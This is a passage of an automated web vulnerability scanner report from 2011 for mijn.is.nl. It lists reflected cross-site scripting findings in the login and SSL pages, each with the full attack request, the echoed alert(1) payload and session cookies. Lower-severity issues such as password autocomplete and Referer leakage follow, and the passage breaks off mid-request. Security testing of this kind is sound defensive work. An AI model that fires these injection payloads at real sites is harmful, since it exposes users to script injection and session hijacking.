Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

ctl00_ajaxScriptManager_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjYyMjgxNjc5D2QWAmYPDxYCHghDdXN0b21lcjK%2FEwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABMSVMuSXNpcy5TaG9wLldlYi5CY
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:41:00 GMT
Content-Length: 46297


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<a href='https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspxb4933'style='x:expression(alert(1))'bbea1f2ef55'>
...[SNIP]...

1.10. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1d8c'%3balert(1)//d69855b9901 was submitted in the ReturnUrl parameter. This input was echoed as b1d8c';alert(1)//d69855b9901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspxb1d8c'%3balert(1)//d69855b9901 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:37:49 GMT
Content-Length: 45591


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
'',
'https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspxb1d8c';alert(1)//d69855b9901',
false,
true));
}
</script>
...[SNIP]...

1.11. https://mijn.is.nl/UI/Pages/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9078b'%3balert(1)//9665994f6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9078b';alert(1)//9665994f6b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspx&9078b'%3balert(1)//9665994f6b3=1 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:40:21 GMT
Content-Length: 45615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
'',
'https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspx&9078b';alert(1)//9665994f6b3=1',
false,
true));
}
</script>
...[SNIP]...

1.12. https://mijn.is.nl/UI/Pages/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b541'><script>alert(1)</script>28a568854b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspx&2b541'><script>alert(1)</script>28a568854b2=1 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:40:11 GMT
Content-Length: 45721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<a href='https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspx&2b541'><script>alert(1)</script>28a568854b2=1'>
...[SNIP]...

1.13. https://mijn.is.nl/UI/Pages/SSL/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/SSL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44426'%3balert(1)//0db9393492c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44426';alert(1)//0db9393492c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pages/SSL/?44426'%3balert(1)//0db9393492c=1 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/beveiliging-ssl.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:39:37 GMT
Content-Length: 81545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
false,
'',
'https://mijn.is.nl/UI/Pages/SSL/default.aspx?44426';alert(1)//0db9393492c=1',
false,
true));
}
</script>
...[SNIP]...

1.14. https://mijn.is.nl/UI/Pages/SSL/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/SSL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6cd77'><script>alert(1)</script>14989cf3fe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /UI/Pages/SSL/?6cd77'><script>alert(1)</script>14989cf3fe0=1 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/beveiliging-ssl.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:39:16 GMT
Content-Length: 81663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<a href='https://mijn.is.nl/UI/Pages/SSL/default.aspx?6cd77'><script>alert(1)</script>14989cf3fe0=1'>
...[SNIP]...

2. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /UI/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw** HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:33:19 GMT
Content-Length: 46231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$mainContent$uxLoginView$uxUserLogin$Password" type="password" id="ctl00_mainContent_uxLoginView_uxUserLogin_Password" style="width:100px;" /><span id="ctl00_mainContent_uxLoginView_uxUserLogin_PasswordRequired" title="Wachtwoord is vereist" style="color:Red;visibility:hidden;">
...[SNIP]...

3. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://mijn.is.nl
Path:   /UI/Themes/ISOnline/css/shopmaster.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /UI/Themes/ISOnline/css/shopmaster.css HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://mijn.is.nl/UI/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw**
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 11:39:31 GMT
Accept-Ranges: bytes
ETag: "ac2c5b9d4fffcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:33:21 GMT
Content-Length: 13795

.../*
####################################################################################################
#
...[SNIP]...
box;
display: inline-block;
}

/* Ajax TABS controle xp theme */
.ajax__tab_xp .ajax__tab_header {
font-family: 'Segoe UI' , Tahoma, Sans-Serif;
font-size: 8px;
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-line.gif")%>) repeat-x bottom;
white-space: normal !important;
}

.ajax__tab_xp .ajax__tab_outer {
padding-right: 4px;
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-right.gif")%>) no-repeat right;
height: 21px;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_inner {
padding-left: 3px;
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-left.gif")%>) no-repeat;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_tab {
padding: 4px;
margin: 0;
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab.gif")%>) repeat-x;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_hover .ajax__tab_outer {
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-hover-right.gif")%>) no-repeat right;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_hover .ajax__tab_inner {
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-hover-left.gif")%>) no-repeat;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_hover .ajax__tab_tab {
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-hover.gif")%>) repeat-x;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_active .ajax__tab_outer {
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-active-right.gif")%>) no-repeat right;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_active .ajax__tab_inner {
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-active-left.gif")%>) no-repeat;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_active .ajax__tab_tab {
background: url(<%=WebResource("AjaxControlToolkit.Tabs.tab-active.gif")%>) repeat-x;
display: -moz-inline-box;
display: inline-block;
}

.ajax__tab_xp .ajax__tab_body {
font-family: 'Segoe UI' , Tahoma, Sans-Serif;
font-size: 8pt;
border: 1px sol
...[SNIP]...

4. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


4.1. https://mijn.is.nl/UI/Pages/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The page contains a form which POSTs data to the domain www.is.nl. The form contains the following fields:

Request

GET /UI/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw** HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:33:19 GMT
Content-Length: 46231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
</form><form action="http://www.is.nl/index.php" method="post" class="search">
   <div class="searchbox">
...[SNIP]...

4.2. https://mijn.is.nl/UI/Pages/SSL/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/SSL/

Issue detail

The page contains a form which POSTs data to the domain www.is.nl. The form contains the following fields:

Request

GET /UI/Pages/SSL/ HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/beveiliging-ssl.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:34:18 GMT
Content-Length: 81369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
</form><form action="http://www.is.nl/index.php" method="post" class="search">
   <div class="searchbox">
...[SNIP]...

5. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

POST /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspx HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
Content-Length: 14563
Cache-Control: max-age=0
Origin: https://mijn.is.nl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
